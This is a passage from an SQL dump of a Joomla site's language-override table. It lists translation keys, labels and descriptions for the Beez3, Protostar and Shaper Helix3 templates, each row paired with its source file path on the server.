middle','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4320,'TPL_BEEZ3_POSITION_POSITION-5','Left bottom','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4321,'TPL_BEEZ3_POSITION_POSITION-6','Right top','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4322,'TPL_BEEZ3_POSITION_POSITION-7','Left top','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4323,'TPL_BEEZ3_POSITION_POSITION-8','Right middle','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4324,'TPL_BEEZ3_POSITION_POSITION-9','Footer top','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4325,'TPL_BEEZ3_XML_DESCRIPTION','Accessible site template for Joomla! 3.x. Beez3, the HTML5 version.','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4326,'TPL_PROTOSTAR_XML_DESCRIPTION','Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Protostar is the Joomla 3 site template based on Bootstrap and the launch of the Joomla User Interface library (JUI).','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4327,'TPL_PROTOSTAR_BACKGROUND_COLOR_DESC','Choose a background colour for static layouts. If left blank the Default (#f4f6f7) is used.','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4328,'TPL_PROTOSTAR_BACKGROUND_COLOR_LABEL','Background Colour','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4329,'TPL_PROTOSTAR_BACKTOTOP','Back to Top','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4330,'TPL_PROTOSTAR_COLOR_DESC','Choose an overall colour for the site template. If left blank the Default (#0088cc) is used.','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4331,'TPL_PROTOSTAR_COLOR_LABEL','Template Colour','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4332,'TPL_PROTOSTAR_FLUID','Fluid','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4333,'TPL_PROTOSTAR_FLUID_LABEL','Fluid Layout','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4334,'TPL_PROTOSTAR_FLUID_DESC','Use Bootstrap\'s fluid or static container (both are responsive).','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4335,'TPL_PROTOSTAR_FONT_LABEL','Google Font for Headings','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4336,'TPL_PROTOSTAR_FONT_DESC','Load a Google font for the headings (H1, H2, H3, etc).','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4337,'TPL_PROTOSTAR_FONT_NAME_LABEL','Google Font Name','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4338,'TPL_PROTOSTAR_FONT_NAME_DESC','Example: Open+Sans or Source+Sans+Pro.','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4339,'TPL_PROTOSTAR_LOGO_LABEL','Logo','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4340,'TPL_PROTOSTAR_LOGO_DESC','Select or upload a custom logo for the site template.','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4341,'TPL_PROTOSTAR_STATIC','Static','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4342,'TPL_PROTOSTAR_TOGGLE_MENU','Toggle Navigation','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.ini'),(4343,'TPL_PROTOSTAR_POSITION_BANNER','Banner','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4344,'TPL_PROTOSTAR_POSITION_DEBUG','Debug','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4345,'TPL_PROTOSTAR_POSITION_POSITION-0','Search','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4346,'TPL_PROTOSTAR_POSITION_POSITION-10','Unused','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4347,'TPL_PROTOSTAR_POSITION_POSITION-11','Unused','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4348,'TPL_PROTOSTAR_POSITION_POSITION-12','Unused','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4349,'TPL_PROTOSTAR_POSITION_POSITION-13','Unused','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4350,'TPL_PROTOSTAR_POSITION_POSITION-14','Unused','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4351,'TPL_PROTOSTAR_POSITION_POSITION-15','Unused','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4352,'TPL_PROTOSTAR_POSITION_POSITION-1','Navigation','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4353,'TPL_PROTOSTAR_POSITION_POSITION-2','Breadcrumbs','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4354,'TPL_PROTOSTAR_POSITION_POSITION-3','Top center','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4355,'TPL_PROTOSTAR_POSITION_POSITION-4','Unused','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4356,'TPL_PROTOSTAR_POSITION_POSITION-5','Unused','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4357,'TPL_PROTOSTAR_POSITION_POSITION-6','Unused','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4358,'TPL_PROTOSTAR_POSITION_POSITION-7','Right','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4359,'TPL_PROTOSTAR_POSITION_POSITION-8','Left','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4360,'TPL_PROTOSTAR_POSITION_POSITION-9','Unused','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4361,'TPL_PROTOSTAR_POSITION_FOOTER','Footer','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4362,'TPL_PROTOSTAR_XML_DESCRIPTION','Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Protostar is the Joomla 3 site template based on Bootstrap and the launch of the Joomla User Interface library (JUI).','/home/smthsmth/public_html/templates/protostar/language/en-GB/en-GB.tpl_protostar.sys.ini'),(4363,'HELIX_YES','Yes','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4364,'HELIX_NO','No','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4365,'HELIX_SHOW','Show','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4366,'HELIX_HIDE','Hide','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4367,'JDETAILS','<i class=\'fa fa-home\'></i>Basic','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4368,'HELIX_HEADER','Header','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4369,'HELIX_STICKY_HEADER','Sticky Header','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4370,'HELIX_STICKY_HEADER_DESC','Enable to get the header content area to stay visible at the top of the screen as you scroll through that content. Header tend to contain navigation and this may improve UX of website.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4371,'HELIX_FAVICON','Favicon','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4372,'HELIX_FAVICON_DESC','Upload a 16px x 16px .png or .gif image that will be your favicon.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4373,'HELIX_LOGO','Logo','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4374,'HELIX_LOGO_TYPE','Logo Type','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4375,'HELIX_LOGO_TYPE_DESC','Select logo type from the list.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4376,'HELIX_LOGO_TYPE_IMAGE','Image','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4377,'HELIX_LOGO_TYPE_IMAGE_DESC','Select/upload logo image.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4378,'HELIX_LOGO_TYPE_IMAGE_RETINA','Retina Logo','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4379,'HELIX_LOGO_TYPE_IMAGE_RETINA_DESC','Upload a double size of your logo to keep look great of higher resulationary devices like retina or 5k display.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4380,'HELIX_LOGO_TYPE_TEXT','Text','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4381,'HELIX_LOGO_TYPE_TEXT_DESC','Enter logo text.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4382,'HELIX_LOGO_SLOGAN','Logo Slogan','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4383,'HELIX_LOGO_SLOGAN_DESC','Enter slogan text.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4384,'HELIX_MODULE_POSITIONS','Module Position','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4385,'HELIX_MODULE_POSITIONS_DESC','Select a suitable module position where you want to display this feature.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4386,'HELIX_MOBILE_LOGO','Mobile Logo','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4387,'HELIX_MOBILE_LOGO_DESC','This logo will be shown in mobile view instead of default logo. Leave blank if you do not want to show different logo for mobile devices.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4388,'HELIX_BOXED_LAYOUT','Boxed Layout','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4389,'HELIX_ENABLE_BOXED_LAYOUT','Enable','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4390,'HELIX_ENABLE_BOXED_LAYOUT_DESC','Enable this option for boxed layout.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4391,'HELIX_FOOTER','Footer','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4392,'HELIX_COPYRIGHT','Copyright','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4393,'HELIX_COPYRIGHT_DESC','Show or hide copyright information.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4394,'HELIX_COMPYRIGHT_TEXT','Copyright Notice','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4395,'HELIX_COMPYRIGHT_TEXT_DESC','The Copyright Notice should contain any necessary copyright notice for claiming the intellectual property, and should identify the current owner(s) of the copyright for the content. All HTML tags are allowed.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4396,'HELIX_SOCIAL_ICONS','Social Icons','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4397,'HELIX_SOCIAL_ICONS_DESC','Enable this option to show social icons.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4398,'HELIX_SOCIAL_ICON_FACEBOOK','Facebook URL','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4399,'HELIX_SOCIAL_ICON_FACEBOOK_DESC','Input the full URL to your Facebook profile page.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4400,'HELIX_SOCIAL_ICON_TWITTER','Twitter URL','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4401,'HELIX_SOCIAL_ICON_TWITTER_DESC','Input the full URL to your Twitter profile page.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4402,'HELIX_SOCIAL_ICON_GOOGLEPLUS','Google Plus URL','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4403,'HELIX_SOCIAL_ICON_GOOGLEPLUS_DESC','Input the full URL to your Google+ profile page.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4404,'HELIX_SOCIAL_ICON_PINTEREST','Pinterest URL','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4405,'HELIX_SOCIAL_ICON_PINTEREST_DESC','Input the full URL to your Pinterest profile page.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4406,'HELIX_SOCIAL_ICON_LINKEDIN','Linkedin URL','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4407,'HELIX_SOCIAL_ICON_LINKEDIN_DESC','Input the full URL to your Linkedin profile page.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4408,'HELIX_SOCIAL_ICON_DRIBBBLE','Dribbble URL','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4409,'HELIX_SOCIAL_ICON_DRIBBBLE_DESC','Input the full URL to your Dribbble profile page. ','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4410,'HELIX_SOCIAL_ICON_BEHANCE','Behance URL','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4411,'HELIX_SOCIAL_ICON_BEHANCE_DESC','Input the full URL to your Behance profile page.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4412,'HELIX_SOCIAL_ICON_YOUTUBE','YouTube URL','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4413,'HELIX_SOCIAL_ICON_YOUTUBE_DESC','Input the full URL to your YouTube profile page.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4414,'HELIX_SOCIAL_ICON_FLICKR','Flickr URL','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4415,'HELIX_SOCIAL_ICON_FLICKR_DESC','Input the full URL to your Flickr profile page.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4416,'HELIX_SOCIAL_ICON_SKYPE','Skype Username','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4417,'HELIX_SOCIAL_ICON_SKYPE_DESC','Input your Skype Name, a unique user name that is used to sign in to Skype.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4418,'HELIX_SOCIAL_ICON_VK','VK Username','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4419,'HELIX_SOCIAL_ICON_VK_DESC','Input the full URL to your VK profile page.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4420,'HELIX_CONTACT_INFO','Contact Information','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4421,'HELIX_ENABLE_CONTACT_INFO','Enable','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4422,'HELIX_ENABLE_CONTACT_INFO_DESC','Enable this option to show contact information.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4423,'HELIX_CONTACT_PHONE','Phone','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4424,'HELIX_CONTACT_PHONE_DESC','Add phone number here. Leave blank if no phone is required.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4425,'HELIX_CONTACT_EMAIL','Email','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4426,'HELIX_CONTACT_EMAIL_DESC','Add email address here. Leave blank if no email is required.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4427,'HELIX_COMINGOON','Coming Soon','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4428,'HELIX_COMINGSOON_MODE','Coming Soon Mode','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4429,'HELIX_COMINGSOON_MODE_DESC','Helix v3 introduces a Coming Soon page which allows you to display a stylish page indicating that your site is either being worked on or under construction','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4430,'HELIX_COMINGSOON_TITLE','Coming Soon Title','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4431,'HELIX_COMINGSOON_TITLE_DESC','Write a headline for your Coming soon page.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4432,'HELIX_COMINGSOON_DATE','Date','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4433,'HELIX_COMINGSOON_DATE_DESC','Insert date used for Countdown timer','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4434,'HELIX_COMINGSOON_CONTENT','Content','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4435,'HELIX_COMINGSOON_CONTENT_DESC','Description field so you can let visitors know what’s coming. Tip: Add also contact info.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4436,'COM_TEMPLATES_PRESET_FIELDSET_LABEL','<i class=\'fa fa-paint-brush\'></i>Presets','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4437,'HELIX_PRESETS','Preset Styles','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4438,'HELIX_STYLEING_OPTIONS','Styling Options','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4439,'HELIX_BODY_BACKGROUND_IMAGE_LABEL','Body Background Image','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4440,'HELIX_BODY_BACKGROUND_IMAGE','Select Image','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4441,'HELIX_BODY_BACKGROUND_IMAGE_DESC','Select image which will be used as the background. To remove a background image, simply delete the URL from the settings field.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4442,'HELIX_BACKGROUND_COLOR','Background Color','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4443,'HELIX_BACKGROUND_COLOR_DESC','Define a background solid color that will show behind the image.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4444,'HELIX_TEXT_COLOR','Text Color','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4445,'HELIX_TEXT_COLOR_DESC','The color attribute specifies the main color of the text.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4446,'HELIX_MAJOR_COLOR','Major Color','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4447,'HELIX_MAJOR_COLOR_DESC','Major color setting based on chosen Preset','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4448,'COM_TEMPLATES_LAYOUT_FIELDSET_LABEL','<i class=\'fa fa-list-alt\'></i>Layout','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4449,'HELIX_SAVE_COPY','Save as Copy','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4450,'HELIX_DELETE','Delete','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4451,'HELIX_ENTER_LAYOUT_NAME','Enter Layout Name','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4452,'HELIX_APPLY','Apply','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4453,'HELIX_CANCEL','Cancel','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4454,'HELIX_ARRANGE_ROWS','Arrange Rows','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4455,'HELIX_ADD_ROW','Add Row','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4456,'HELIX_ROW_SETTINGS','Row Settings','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4457,'HELIX_REMOVE_ROW','Remove Row','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4458,'HELIX_NONE','None','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4459,'HELIX_COLUMN_SETTINGS','Column Settings3','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4460,'HELIX_ADD_COLUMNS','Add Columns','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4461,'HELIX_SETTINGS','Settings','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4462,'HELIX_REMOVE','Remove','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4463,'HELIX_SECTION_TITLE','Section Title','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4464,'HELIX_SECTION_TITLE_DESC','Section title will be replaced by section ID in the front-end. e.g. If you set section title as \"<strong>Main Body</strong>\" then you will get output as <section id=\"main-body\"></section> in the frontend.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4465,'HELIX_SECTION_BACKGROUND_COLOR','Background Color','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4466,'HELIX_SECTION_BACKGROUND_COLOR_DESC','Background color will be applied in this section. Leave this field blank if this section does not require a background color.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4467,'HELIX_SECTION_TEXT_COLOR','Text Color','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4468,'HELIX_SECTION_TEXT_COLOR_DESC','Text color will be applied in this section. Leave this field blank if this section does not require a text color.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4469,'HELIX_SECTION_BACKGROUND_IMAGE','Background Image','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4470,'HELIX_SECTION_BACKGROUND_IMAGE_DESC','Set background image for this section. Always set a background-color to be used if the image is unavailable.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4471,'HELIX_BG_REPEAT','Background Repeat','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4472,'HELIX_BG_REPEAT_DESC','Set how a background image will be repeated. By default, a background-image is no repeated, and the image is placed at the top left corner.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4473,'HELIX_BG_REPEAT_NO','No Repeat','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4474,'HELIX_BG_REPEAT_ALL','Repeat All','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4475,'HELIX_BG_REPEAT_HORIZ','Repeat Horizontally','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4476,'HELIX_BG_REPEAT_VERTI','Repeat Vertically','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4477,'HELIX_BG_REPEAT_INHERIT','Inherit','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4478,'HELIX_BG_SIZE','Background Size','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4479,'HELIX_BG_SIZE_DESC','Set the size of the background image. Default vaule is cover - is means scale the background image to be as large as possible so that the background area is completely covered by the background image.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4480,'HELIX_BG_COVER','Cover','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4481,'HELIX_BG_CONTAIN','Contain','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4482,'HELIX_BG_INHERIT','Inherit','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4483,'HELIX_BG_ATTACHMENT','Background Attachment','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4484,'HELIX_BG_ATTACHMENT_DESC','Set whether a background image attachment is fixed or scrolls.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4485,'HELIX_BG_ATTACHMENT_FIXED','Fixed','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4486,'HELIX_BG_ATTACHMENT_SCROLL','Scroll','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4487,'HELIX_BG_ATTACHMENT_INHERIT','Inherit','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4488,'HELIX_BG_POSITION','Background Position','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4489,'HELIX_BG_POSITION_DESC','Set the starting position of a background image.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4490,'HELIX_BG_POSITION_LEFT_TOP','Left Top','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4491,'HELIX_BG_POSITION_LEFT_CENTER','Left Center','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4492,'HELIX_BG_POSITION_LEFT_BOTTOM','Left Bottom','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4493,'HELIX_BG_POSITION_CENTER_TOP','Center Top','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4494,'HELIX_BG_POSITION_CENTER_CENTER','Center Center','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4495,'HELIX_BG_POSITION_CENTER_BOTTOM','Center Bottom','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4496,'HELIX_BG_POSITION_RIGHT_TOP','Right Top','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4497,'HELIX_BG_POSITION_RIGHT_CENTER','Right Center','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4498,'HELIX_BG_POSITION_RIGHT_BOTTOM','Right Bottom','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4499,'HELIX_LINK_COLOR','Link Color','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4500,'HELIX_LINK_COLOR_DESC','Leave this field blank if link color is not required.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4501,'HELIX_LINK_HOVER_COLOR','Link Hover 